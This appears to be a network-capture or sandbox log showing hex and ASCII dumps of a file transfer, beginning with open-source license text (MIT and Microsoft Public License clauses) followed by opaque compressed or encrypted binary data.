                                                                                                                                  2022-01-11 22:39:07 UTC2700INData Raw: 69 73 68 65 64 20 74 6f 20 64 6f 20 73 6f 2c 20 73 75 62 6a 65 63 74 20 74 6f 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 63 6f 6e 64 69 74 69 6f 6e 73 3a 0a 0a 54 68 65 20 61 62 6f 76 65 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 6e 64 20 74 68 69 73 20 70 65 72 6d 69 73 73 69 6f 6e 20 6e 6f 74 69 63 65 20 73 68 61 6c 6c 20 62 65 20 69 6e 63 6c 75 64 65 64 20 69 6e 0a 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f
                                                                                                                                  Data Ascii: ished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included inall copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS O
                                                                                                                                  2022-01-11 22:39:07 UTC2716INData Raw: 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 0a 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 0a 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 4e 4f 4e 49 4e 46 52 49 4e 47 45 4d 45 4e 54 2e 20 49 4e 20 4e 4f 20 45 56 45 4e 54 20 53 48 41 4c 4c 20 54 48 45 0a 41 55 54 48 4f 52 53 20 4f 52 20 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 0a 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54
                                                                                                                                  Data Ascii: NY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHET
                                                                                                                                  2022-01-11 22:39:07 UTC2732INData Raw: 73 20 79 6f 75 20 63 68 6f 6f 73 65 2e 0a 20 28 42 29 20 4e 6f 20 54 72 61 64 65 6d 61 72 6b 20 4c 69 63 65 6e 73 65 2d 20 54 68 69 73 20 6c 69 63 65 6e 73 65 20 64 6f 65 73 20 6e 6f 74 20 67 72 61 6e 74 20 79 6f 75 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 20 61 6e 79 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 27 20 6e 61 6d 65 2c 20 6c 6f 67 6f 2c 20 6f 72 20 74 72 61 64 65 6d 61 72 6b 73 2e 0a 20 28 43 29 20 49 66 20 79 6f 75 20 62 72 69 6e 67 20 61 20 70 61 74 65 6e 74 20 63 6c 61 69 6d 20 61 67 61 69 6e 73 74 20 61 6e 79 20 63 6f 6e 74 72 69 62 75 74 6f 72 20 6f 76 65 72 20 70 61 74 65 6e 74 73 20 74 68 61 74 20 79 6f 75 20 63 6c 61 69 6d 20 61 72 65 20 69 6e 66 72 69 6e 67 65 64 20 62 79 20 74 68 65 20 73 6f 66 74 77 61 72 65 2c 20 79 6f 75 72 20 70 61
                                                                                                                                  Data Ascii: s you choose. (B) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks. (C) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your pa
                                                                                                                                  2022-01-11 22:39:07 UTC2748INData Raw: 5c 94 e8 4b ce f3 bb 31 18 10 3e 48 f9 93 76 a0 06 4d 06 fb da 69 f8 48 12 25 c4 47 ce 7d 79 d4 ee 28 57 5a bc 6a 53 c0 ce a7 9c 76 63 42 62 9a 32 47 fe 67 d3 1d f2 01 1f e5 53 a1 9e 81 73 e3 30 8c ce 4b d9 e9 ce 25 45 50 ab b4 0c 4d 9c 43 61 d1 16 de 04 9a 00 68 03 3a 27 73 13 5a a8 2b 53 ab de c4 b6 77 c9 20 e7 66 18 56 43 64 fe 2e 62 a4 ad 85 9b cf 34 5a 3d cd 0b c5 53 b4 bd 5c f3 25 e8 06 0e a3 05 4d 59 fe 40 e9 0f 22 ca ff 90 32 e2 ad 57 3a 76 33 3f 78 86 b0 55 ba 2f 98 ef 88 2b 1d 29 2b 71 a2 ca 37 e0 fd 01 e4 ce aa e3 a8 ef d9 d7 31 be c8 6d a4 f8 6a b3 8d 2b 7c c1 69 64 1d d8 6c c5 16 12 3a f7 11 6d dc a8 fe 6d c3 19 43 d4 1f 57 98 d6 90 cd 13 f9 fa 86 bb fa 3d 53 a8 f9 6d 7a 44 be ac fa a4 a6 46 0d 5b cb 52 91 a2 d7 74 86 e1 c0 ad 23 04 c3 62 c8
                                                                                                                                  Data Ascii: \K1>HvMiH%G}y(WZjSvcBb2GgSs0K%EPMCah:'sZ+Sw fVCd.b4Z=S\%MY@"2W:v3?xU/+)+q71mj+|idl:mmCW=SmzDF[Rt#b
                                                                                                                                  2022-01-11 22:39:07 UTC2764INData Raw: e3 24 8c af 70 f4 0a 90 0d 97 af 1d 39 76 1a 26 02 7c 85 03 3d e7 0d e5 36 14 ad 58 dc ee 45 03 c0 14 f3 9f 5d c4 11 f5 38 bc ec 7a 94 34 5f d1 52 f0 58 7f 4f 3d 42 18 2b 83 16 ec 24 68 a8 2d 45 6d 34 fb dd a6 ea dc 0a 94 a1 10 f7 10 f8 21 3f f1 76 f3 3b 24 73 d1 b8 5d 43 32 cd ac 95 d1 86 18 17 49 a6 d2 b5 3e 3b 4f 98 5b f2 57 3c de 9d 69 a2 ad 4c d1 28 fc e3 ce 19 0b 4f cf 79 3c 27 59 f1 63 b8 97 ca 88 3a 54 72 a2 46 e1 ec 37 d2 1f 02 a8 7d 10 01 a9 c1 8f d5 5c 38 c5 1f 53 2e 3b 49 51 96 83 1c c5 11 10 69 bf 72 db 07 5e a2 29 4c be 50 2e 0c b3 0c 9d df 21 69 d2 bf 96 45 2b 6c 10 61 7d b3 c7 a9 75 da 3f 18 c3 84 c4 cf ea 93 e2 66 03 63 2a be 39 3e 47 6c e3 da 62 3a 64 f9 45 d7 95 59 69 b4 0d c7 63 5e 59 60 ba ea f4 9b fa 31 6d 76 96 72 fa 6a 0c 5f 29 b1
                                                                                                                                  Data Ascii: $p9v&|=6XE]8z4_RXO=B+$h-Em4!?v;$s]C2I>;O[W<iL(Oy<'Yc:TrF7}\8S.;IQir^)LP.!iE+la}u?fc*9>Glb:dEYic^Y`1mvrj_)
                                                                                                                                  2022-01-11 22:39:07 UTC2780INData Raw: 34 e3 a4 c5 d4 33 e8 fb 9e 94 cb c0 a0 2e 5e 41 75 69 69 04 9a f1 fd ee 99 6e 37 8a db f4 17 7d df a9 a7 32 ad 50 0d 04 54 af 95 a1 6d 80 2e b8 c1 ac 9f bf c7 6b 86 5f ee ce 3e 3f fe 6c 12 d5 47 a8 8e 04 ea 42 91 ea 4b 2d b5 3d 4e 6e f2 1a 15 99 29 8a e6 20 46 f0 f9 ef 9d b4 81 fa 5b ab 1c 72 81 ce 1c bd 61 aa 82 1f 06 b0 ed d7 96 7e 2a 74 58 07 9c 00 50 82 ea 28 6c c2 ad 60 69 8c 6a c4 7c 07 9a 3b aa 0d f0 77 66 1a bd 79 d2 c4 aa 20 c6 5b 33 dd 42 0b 70 d5 aa e0 46 c7 6b f4 c5 3c 09 b0 d0 a2 82 b0 04 3e 19 77 ff 55 7f d0 b7 3f 68 23 d5 db d1 a4 7d d9 67 5c e3 4c 31 34 1e 4e 53 48 e5 ad c6 d4 bc 6e 07 48 04 f7 92 1e 00 4e c8 2a b7 91 35 d9 e1 8b 4a d6 52 b5 1a dc 65 07 79 4e 8d f3 64 e5 61 6e 8a 94 da 17 fd 37 83 01 bf f0 c5 86 81 55 cf 7f 98 85 34 af 27
                                                                                                                                  Data Ascii: 43.^Auiin7}2PTm.k_>?lGBK-=Nn) F[ra~*tXP(l`ij|;wfy [3BpFk<>wU?h#}g\L14NSHnHN*5JReyNdan7U4'
                                                                                                                                  2022-01-11 22:39:07 UTC2796INData Raw: 09 ab db 3c ce f5 a6 2d ab a8 25 59 fb 29 5d 63 50 72 42 92 22 f3 90 f3 8c 27 e4 c4 80 17 50 4d db 7a 24 36 7b b4 0f 29 bf 45 b7 d0 0f 3e 9e 83 cb 90 ce bd 93 64 98 2c bd 96 9e 91 17 93 73 fe d7 b7 90 e6 0b cf 0d 15 d9 98 63 2d f0 eb e9 91 62 e6 9b 94 62 49 27 12 15 3d 50 ff 94 7d 2a 61 7c a0 03 ba 75 86 46 d8 b7 52 27 44 52 26 b6 ce e0 30 e0 45 80 fe 0b b7 4f 9c f8 1d d5 9c 83 c5 67 ac 00 cc 7e 04 e7 7a 82 76 e9 fc f2 fd 87 e3 ac 56 d8 30 29 80 bf 3c b7 e2 c9 e2 86 cb 15 cd bd ba 5f 12 0c 84 8f cb 72 d2 d0 4e 5c fd fc 8c 15 78 5b 58 cf 47 b2 13 e3 5d 46 ed c9 04 c6 ef 5c 04 98 18 fb d1 e3 dc 50 03 9c 23 84 ee 09 eb c7 fd de b8 e7 d7 54 0d 9d a3 e2 e4 ed b4 68 e0 89 a2 fe 16 57 50 f6 1b fb 6a ae fe cd c2 67 aa b5 72 fe f4 b9 84 c9 88 ac 98 62 15 c3 e1 80
                                                                                                                                  Data Ascii: <-%Y)]cPrB"'PMz$6{)E>d,sc-bbI'=P}*a|uFR'DR&0EOg~zvV0)<_rN\x[XG]F\P#ThWPjgrb
                                                                                                                                  2022-01-11 22:39:07 UTC2812INData Raw: 47 bf e2 0d a3 0e 74 a8 e0 21 fd 15 3b 93 cf 37 7b 8d 86 26 5e 7d 67 13 7a 18 de 7f 61 5b 84 f8 e6 d6 4f 9d bb 74 a7 ce ab 84 72 bb ee 71 93 26 9b ae cd 9e 84 93 9a 42 ec f1 25 be 86 37 e6 20 99 a5 bc 10 2e ee 64 25 a3 54 8d f1 35 62 a2 35 43 c1 b9 59 7f 0c d8 44 6c 60 f9 00 12 a1 33 76 e3 0a c4 73 ea 88 03 4a 84 17 24 97 14 5d 75 04 d2 bc 47 d1 3c 56 e3 85 4c d5 9c f7 f1 6e 21 ed e1 e0 3e 8c 46 6d 8b 33 52 8a e5 40 dc ce 6f c8 50 ce 3a b3 cb 23 6c f5 10 29 fe 2d a7 df fa d7 e2 f1 19 2d e0 62 d7 b0 9b 5d 1a 04 36 b6 18 4e 06 06 a6 cc d9 26 67 8d f2 15 74 82 d5 49 1e 04 ef e3 1f 51 aa 8a 24 c1 c4 df 1a 92 60 d0 12 04 e2 6f 7e 7f ae 45 a3 ac 92 11 85 9e b1 65 a9 46 1c b4 b0 bd 5d 09 3f 86 c6 1f 1a fc 9c 92 ff 02 8a 25 9a e8 3a 88 36 34 31 ee eb 38 83 0d cf
                                                                                                                                  Data Ascii: Gt!;7{&^}gza[Otrq&B%7 .d%T5b5CYDl`3vsJ$]uG<VLn!>Fm3R@oP:#l)--b]6N&gtIQ$`o~EeF]?%:6418
                                                                                                                                  2022-01-11 22:39:07 UTC2828INData Raw: f1 73 4f b6 ef 72 74 28 7e 51 b8 0f b3 dc 09 72 58 c2 2d 5d 3c c3 1d ad 73 ad cb 24 dc fe e3 5d 2f 23 64 c9 64 55 fb 80 67 be e1 3c 51 29 81 62 4b 9e b9 15 b9 02 ae 39 3e 88 9f e1 a9 cc 29 12 50 e4 1e 38 2b 0a 9c 56 cd ae a8 b7 6c 09 9c bf 43 1d ab 81 a2 ed b6 97 8e 95 39 0e 02 e5 9d 71 07 bb b8 b9 30 26 39 51 80 04 67 f0 94 79 a2 b8 9a 39 40 34 81 c5 8b a4 2e 93 98 56 fe 89 fe a4 9b b2 cb 1d 1e 0e 1b 55 48 eb 4e 3f f8 22 38 3c 76 50 df 1a 29 43 f7 87 01 f1 a0 cc 70 6b 55 95 27 6d b1 9d 77 44 ee 09 02 f3 f8 af 87 fa fe 18 22 56 d1 d1 91 ed 16 65 1a 1f cb fc 86 3d 27 23 20 29 3a 5f 4f 12 a2 e0 a6 12 ec c0 c9 f4 ef 5f ee 14 4c df 34 50 9e 8c 15 25 77 57 fa ba 26 94 9a 6d 73 26 89 e2 d7 ff fa 0e ad d1 d1 05 50 ba 73 18 f5 e6 33 0b 10 aa 00 c4 88 fa d8 b0 a8
                                                                                                                                  Data Ascii: sOrt(~QrX-]<s$]/#ddUg<Q)bK9>)P8+VlC9q0&9Qgy9@4.VUHN?"8<vP)CpkU'mwD"Ve='# ):_O_L4P%wW&ms&Ps3
                                                                                                                                  2022-01-11 22:39:07 UTC2844INData Raw: c6 50 dc 41 f0 6d 91 e2 a2 f7 53 80 45 71 5a c9 30 c0 b6 0f 65 a6 57 47 d6 d2 5a 57 4f 11 b7 6a 5c d0 c9 47 32 aa 12 a7 0e 49 76 f4 60 f2 31 8e 6e 3d 13 5a d5 c9 af 27 1e 89 7e 27 89 63 be 10 8d ab de 22 c5 0f 30 c3 c2 02 b4 7a 98 6c 49 56 72 a9 7d a2 97 26 df 51 3c a1 62 3a 87 15 7d 46 ec 57 b1 9d 56 6d 57 2d 8d 9b 48 cd 06 3f 7e d5 ac 23 56 ae b6 93 b4 70 ca 54 10 63 d5 64 63 85 bd f8 61 6e b0 b6 2d 27 97 5c 1e f1 b2 84 95 36 f0 e3 d9 2d 4f 48 5c 1e 85 a9 0d 80 3c 30 46 7a a4 04 16 f8 41 79 48 0f 10 c4 62 cf 6d fe 31 9b 79 e4 8a f2 36 cb 25 50 43 c9 e4 d5 92 6f 2e dc ba 06 44 2d 0c 1d 75 8b 1b aa 1c 0c 13 a6 63 11 3f d8 3b 7d 98 b4 21 86 12 81 ba 9a 7a aa 78 de 3a 6d d2 2e cd fc 34 51 78 4c a0 51 de b5 ad 37 06 f9 8c d2 f2 d6 8c e2 44 55 2f 02 da bb e2
                                                                                                                                  Data Ascii: PAmSEqZ0eWGZWOj\G2Iv`1n=Z'~'c"0zlIVr}&Q<b:}FWVmW-H?~#VpTcdcan-'\6-OH\<0FzAyHbm1y6%PCo.D-uc?;}!zx:m.4QxLQ7DU/
                                                                                                                                  2022-01-11 22:39:07 UTC2860INData Raw: 1d 23 ae eb 76 7a 91 6e 75 0e 2e f9 b6 ac f0 8f 8c 27 aa 19 d6 99 f5 d3 f8 6b 41 b0 24 4a 62 5e 6b e0 6c 29 78 6e 12 fa 9c 01 c0 ab d3 ac f7 6f c1 ee f9 fb 35 11 3c 00 4d d3 09 25 b4 ba d6 ec 0d a1 81 0f 80 f1 85 a9 22 51 b5 ab 36 8a 26 50 19 e7 b4 e4 8e be 14 ac 5b 71 e8 94 99 83 59 e5 d8 f6 2e fe ea a0 ca 22 73 14 a0 88 f8 27 ae ac 0f 5e f8 78 43 7e 00 09 1f f7 d4 8e e1 e3 a6 fe 09 a2 2f e2 83 da 1b eb fd c1 83 ab 67 2d b8 f7 bc 52 3b aa 23 7b 0a ec 4e d8 9d 74 9e 83 28 5b 05 e4 f0 cf 87 b8 4b 0e 88 c6 cf ff 3a 44 ba a9 64 76 22 da 8e 78 1a 10 0b 39 5f a1 4d 51 85 fa ce cf c1 9b 0a 13 52 73 cb 47 88 b7 78 3d b3 94 d1 51 2d 20 fd fb fc a3 5d eb ce 72 4d 87 6d d8 49 28 b4 e2 1f 54 ee aa 14 68 be 1b 88 6a 65 21 95 8e 51 da 5b f3 1b cb e0 b7 0a 62 ba 4e 3e
                                                                                                                                  Data Ascii: #vznu.'kA$Jb^kl)xno5<M%"Q6&P[qY."s'^xC~/g-R;#{Nt([K:Ddv"x9_MQRsGx=Q- ]rMmI(Thje!Q[bN>
                                                                                                                                  2022-01-11 22:39:07 UTC2876INData Raw: af 0f 47 a5 3f 82 6c d0 74 32 52 ac d8 8c 89 59 59 cf 71 9e 21 78 34 7a d2 c2 ca f8 98 2c 08 fd 04 fc e8 0e 9b cb f9 f4 03 5d c7 29 a8 2c 0f 4a 72 a9 83 92 1a 76 0b 50 06 ea 8e 0c 30 0b b7 fe 77 2f 4d ad 8d f4 52 7d 07 27 ed 83 22 f3 89 35 2d be ad 90 7e d9 d4 72 4c b0 f9 2c 29 45 71 f2 f6 d7 9a 3d a4 c2 07 85 8b 34 5e 2a 2d ba 48 25 67 cc d8 9f 03 2c 19 28 38 df ba bc e3 34 bf 58 bf 0a 26 25 cd c2 26 a2 37 e7 e6 f0 3e bf a5 3d ba e9 a3 e9 5a f6 3f 94 c8 4a 1e 54 37 68 08 3f ad 15 f7 04 26 fa 0c 12 cd f9 cd dd 66 6d 16 93 ab ca 11 74 cf 5e e1 9d b9 8d 4f 93 16 3f 85 56 96 04 7a ef 17 ad 1d db 28 85 ec 0c d3 7a 71 1e 0d bc 81 b2 be 19 ac 0b b3 23 74 6f f0 61 42 63 7c 84 f4 19 c1 f2 d1 5f 63 c3 fb 17 94 32 96 d4 b8 81 11 5f 9e a4 8c 49 db d0 89 c7 00 e3 d1
                                                                                                                                  Data Ascii: G?lt2RYYq!x4z,]),JrvP0w/MR}'"5-~rL,)Eq=4^*-H%g,(84X&%&7>=Z?JT7h?&fmt^O?Vz(zq#toaBc|_c2_I
                                                                                                                                  2022-01-11 22:39:07 UTC2892INData Raw: 1b da 63 bf a9 5c bc 03 c9 e5 b1 c7 76 6d d9 69 78 32 aa 74 03 7a 73 e5 c3 76 8f 5b 58 8c 4c 01 70 a5 03 c4 cb 3a 64 34 6f 53 0f 6b ef 90 df 83 15 0b 4f 9f 72 6f 5d 0b 8f b3 6f ed 94 01 9d 6e 91 5c c9 5f 8c 17 bd 7e e5 e8 92 02 4e 2c 51 59 a6 c8 38 6f 8d bb 4a 0f 00 7f 4b e2 87 04 6d 45 00 c4 c4 8e cf db 61 95 60 f0 b2 51 08 1e 7b 19 ac 4c 6d b9 ea 5b 9b b5 84 2e f6 66 f5 49 59 32 59 8c c8 3b 9c 70 48 77 fd 7b bc 82 8d 76 0b 14 35 a0 d7 9c 18 07 d0 a1 1a 84 bb 3e 2f 36 e6 17 e8 11 57 4a 67 98 65 25 c5 ab 53 29 df af 2e 77 be 50 16 9d 4f d9 28 b8 f3 cf 90 4b 8b f2 2c 74 06 30 bd 68 84 82 9d 04 6d fe 0b 6f 68 75 61 52 d9 09 9d a6 68 d8 a2 c6 5e 52 3c 5a c6 90 37 ca 32 d7 39 c0 7f 60 cf e1 1f c0 2f 03 0f f0 f8 0f 8c 07 a3 39 45 3e c0 2a a7 df 9e e8 cf c8 5f
                                                                                                                                  Data Ascii: c\vmix2tzsv[XLp:d4oSkOro]on\_~N,QY8oJKmEa`Q{Lm[.fIY2Y;pHw{v5>/6WJge%S).wPO(K,t0hmohuaRh^R<Z729`/9E>*_
                                                                                                                                  2022-01-11 22:39:07 UTC2908INData Raw: a6 c6 0b 30 ab 8d bb 2f f3 39 9c 69 78 e5 4b 68 31 0f 96 ee 7d ae 54 3f cb 47 c0 ab 7b 17 b5 af 4c 06 8c 92 0a 02 51 20 b8 01 b3 a4 a1 4b 7d 78 53 a3 04 6e 6d 95 90 24 11 fe f6 5b c6 0d 05 ad 0f 9f ea be 2e 89 7a c0 24 ca 48 5f 65 cf f4 2a cc 74 42 a6 dc 1a 32 f6 9b b3 46 4e 87 45 50 4a 58 24 5d 95 3d 27 8a e4 32 0a b9 dd 33 cc 0f 5e d9 90 e1 77 e6 34 97 13 6c 6b 68 df 1f d8 ee a1 0c 5e b8 33 5c 03 52 af c4 d6 86 5b 47 31 6d 0f ab 09 95 bf a9 14 3b 19 ec b7 66 a0 a9 9c 3e 98 f7 32 b1 02 23 48 c5 75 b8 db 2f da 42 8f 9a fa cb 9b 7e ba cc 4a 10 ad 3c 1f c1 5f 84 4b 21 21 ee ee 64 49 58 3e 41 56 49 e2 c9 a2 c7 88 b8 a2 85 25 72 4d c3 4a dc 7d 1e eb 97 d8 1f a0 ab 07 94 ec db 81 7e aa 01 74 93 61 f4 16 fc 5f 71 22 40 92 95 7a 11 f8 13 d8 92 0e 87 95 86 da 9c
                                                                                                                                  Data Ascii: 0/9ixKh1}T?G{LQ K}xSnm$[.z$H_e*tB2FNEPJX$]='23^w4lkh^3\R[G1m;f>2#Hu/B~J<_K!!dIX>AVI%rMJ}~ta_q"@z
                                                                                                                                  2022-01-11 22:39:07 UTC2924INData Raw: 4b 99 c0 d7 6d 64 72 2b e9 28 81 98 fd e3 5a 04 9e 6f aa 8b cd 46 43 7e 22 5a 81 42 a0 8e 37 4e af 40 65 16 31 f1 a8 75 5b 2f 47 0b d1 f1 4f 05 4c 0b 2b 5a e5 1f 40 35 84 fc 56 4e 0f e6 d5 4f da ef 46 22 e7 9d 4c b7 a2 e5 47 1b d2 4e fb 83 1a e3 5d 7d 44 11 b2 a4 89 00 dd 0d 07 dd 41 1a 1c ef 8e 2c e0 ee 14 59 30 d9 e7 3e 0b 3a 37 17 26 97 0b 66 14 ff dc 39 b2 af fa 8f 31 58 7c d7 5a 8f e6 be 8f 62 ba 13 2a f4 16 c2 5a 67 1a 6e f1 4e 04 f6 82 0d 89 a0 e7 54 1b 09 ff 5d 9b 49 7d ee 1f 7c 34 73 d7 21 0f 5b b2 23 40 c8 59 56 79 d0 90 7f 4e 6a 59 73 4f 1e bd a3 03 a9 9c 06 91 12 b2 9e 4d e4 6f 2a e7 2a 36 93 ac b3 4c 2b c4 df fa 5e 57 d3 a3 e1 7b b7 c9 e9 9b 03 37 77 10 0a ce b8 c3 3b 51 d7 b0 76 8e 22 03 15 af de e4 df 58 44 b2 be 14 79 67 d5 fb 9f 1e 95 90
                                                                                                                                  Data Ascii: Kmdr+(ZoFC~"ZB7N@e1u[/GOL+Z@5VNOF"LGN]}DA,Y0>:7&f91X|Zb*ZgnNT]I}|4s![#@YVyNjYsOMo**6L+^W{7w;Qv"XDyg
                                                                                                                                  2022-01-11 22:39:07 UTC2940INData Raw: c2 73 f9 f8 f6 7c 07 c2 89 b4 12 52 25 40 93 dc fb 07 a3 89 dd 5e d7 6a 87 bc c8 a8 e1 dd 46 6f ec 44 26 19 48 cc ad 25 26 f2 16 4b d2 0f ad 40 5d 1e ad 5e 9f 45 f6 d7 22 a8 6f aa ce ac d6 ee 18 38 cd a3 0d ef 30 3e 7f 8a 60 91 6b 8d 44 c4 0e cf 1b dd 69 5c b1 15 32 55 41 09 0c ae f6 53 9d 16 8a 0b d6 fc a7 64 9c 5f 4d 44 de 9c e0 39 78 09 44 27 e1 37 28 f1 4d 15 21 ff bc a5 86 76 e6 a7 4b 6f c1 00 9f f3 f7 24 59 e4 db b6 9f 73 20 6c e9 58 61 92 b0 61 27 4b 65 78 3a 5e 38 d7 72 bd 00 f5 f1 a3 c8 36 84 70 58 a8 b0 6e 69 5e b3 b5 83 ad eb 79 e4 c1 95 51 d9 61 3b 04 6c 09 31 53 67 e9 91 c1 61 3f 86 c1 1d b4 e7 5e 0b 0c 35 69 1b c3 f6 00 84 d4 05 d5 36 54 c3 11 14 e5 31 87 47 50 e8 99 65 aa b1 b9 ca 3c 97 fc 57 6b ac c8 90 d7 15 f5 d2 f2 fb 3a 16 af a0 0c 63
                                                                                                                                  Data Ascii: s|R%@^jFoD&H%&K@]^E"o80>`kDi\2UASd_MD9xD'7(M!vKo$Ys lXaa'Kex:^8r6pXni^yQa;l1Sga?^5i6T1GPe<Wk:c
                                                                                                                                  2022-01-11 22:39:07 UTC2956INData Raw: e8 df 8e 8b 5e fa 26 80 7c 65 5a c1 39 75 51 9e f8 ca 94 a2 e0 1d 02 29 cf 82 7d 77 7c ce 50 b7 48 3a be d9 10 0f 44 89 97 60 bf 49 5b 82 51 8a a0 8c 94 0f e7 75 67 57 65 2d 85 36 e6 f2 dc 31 5a c0 24 96 48 b5 32 de 46 9e 3e 57 2e 0c 0c 16 cf a0 b4 88 4a b4 05 eb 1d a2 07 33 e2 83 3f 7a d1 81 ef 00 f4 de 50 d9 34 5b 9b 7d ec 75 6c 50 21 5d 94 7b 5f fd b7 83 b5 81 17 cc 7a 13 07 97 64 6f 08 79 ff 65 05 66 14 cb 2c ea 17 bd 38 c7 17 35 5e ae 2f a5 ff 34 c8 bc 75 8f e7 80 34 e1 c2 6c 06 48 75 2f ee 1f b5 59 90 82 8e 30 d1 42 5b 5c 9f e1 ec e2 3d d5 37 a7 a4 8f 6e 73 1a e3 f5 0f e6 6d b9 a5 97 aa 1b c5 b9 54 1b 7b 84 fc 46 39 2b 64 10 1a 61 e6 0e f1 cf 7c 68 36 d8 35 c5 ba c1 b5 a8 aa cd 2b f1 7d a0 61 2a a8 04 ff 1b d4 c2 33 15 a9 93 7c 8d 30 56 2c 9a b7 4d
                                                                                                                                  Data Ascii: ^&|eZ9uQ)}w|PH:D`I[QugWe-61Z$H2F>W.J3?zP4[}ulP!]{_zdoyef,85^/4u4lHu/Y0B[\=7nsmT{F9+da|h65+}a*3|0V,M
                                                                                                                                  2022-01-11 22:39:07 UTC2972INData Raw: dd 53 d8 2d 23 85 19 1a 82 b5 9c 85 0f c5 b7 37 ef c3 0a 83 ac 6a bb 06 16 eb 36 c6 08 bb f7 05 76 21 56 7e 8b 57 08 b8 f7 a2 c0 d2 3c f1 7a 4e 11 2a 4d b2 02 96 ad 66 69 73 33 17 34 1c 00 ae 73 5d d8 ec 17 f3 77 32 c6 c1 32 c6 6a b4 33 ce 36 15 47 9a bf 22 a7 aa c6 ae 6a c5 ff 7f 88 e6 b7 2c 31 aa 71 7e 5d 47 fe fc 90 c0 73 61 ff 3e ab ec 99 73 8a a3 53 a2 4a ee 5a cf a9 2d aa 9a d0 54 13 e8 5b 7c 22 d5 c4 0d f5 56 a9 65 46 07 ea 5d 97 4b 19 2f 56 c5 d5 7d 47 1b fa 9c 09 69 8f 02 0d 49 32 39 1c ff ec 51 ae 6f 9d 2d 38 18 51 d5 0b bc f2 9b 80 46 ce 6c 3b f8 f5 4d de b7 d0 46 3a f6 5a 25 46 93 96 99 a5 86 39 1a 5a d7 ce ee 0f 70 5d 7e 81 dc c0 4e 4f 49 9a 64 e3 2e fa 79 62 ab 2c 37 66 3a b1 be 4f 40 b2 04 0c 05 60 23 e6 82 19 01 23 0a d7 ae a9 e6 47 e7 ff
                                                                                                                                  Data Ascii: S-#7j6v!V~W<zN*Mfis34s]w22j36G"j,1q~]Gsa>sSJZ-T[|"VeF]K/V}GiI29Qo-8QFl;MF:Z%F9Zp]~NOId.yb,7f:O@`##G
                                                                                                                                  2022-01-11 22:39:07 UTC2988INData Raw: 55 4c f1 af 4b f7 e2 1d ed 6c 26 d3 75 f5 82 ee 5a 91 bc 06 b2 49 f8 d0 1b 97 43 fb 36 30 68 93 cc 09 b7 d8 e7 f8 08 3f 9b 54 76 91 0b 7c 29 0b d9 ac ef b3 5c 8e 63 12 65 40 ad 86 e8 ed 5b c0 d5 c0 5c 03 85 8c 98 4a 0c e6 3d 48 ee e6 61 f9 b7 af 27 1f 44 fa e6 61 2f 6e 10 36 58 3a 9c ac 30 6d ad fd 1a 74 28 7f 81 1e a7 8f bd a5 c8 a5 cd 5c af d6 f0 92 c6 53 d5 96 c7 8a b5 0f 2d d2 86 57 fb 85 0a c7 1a 8b a5 ff 2a 11 a9 8a 7a ff 42 c9 d9 f1 0a 6f e6 7a 26 42 4b 7a 7c 97 c5 9f 61 e2 08 0e de de e7 3d 3c fe 13 ba 5d 08 0b d6 87 6c 1f d9 b5 08 42 f2 9c fc db a9 07 56 72 b9 c1 e2 f8 3d 76 4d 0b 9a eb 8a 8d 09 d8 d1 e8 09 4e 0b 1a 78 0a 6b a4 8d 6a e7 cc c9 8f f3 0e f0 14 84 e9 e0 6e 4e 04 76 e2 49 e6 8e 0d 96 e3 03 04 1a 1b 2a 68 a5 ea 47 7e 09 0c 46 97 29 52
                                                                                                                                  Data Ascii: ULKl&uZIC60h?Tv|)\ce@[\J=Ha'Da/n6X:0mt(\S-W*zBoz&BKz|a=<]lBVr=vMNxkjnNvI*hG~F)R
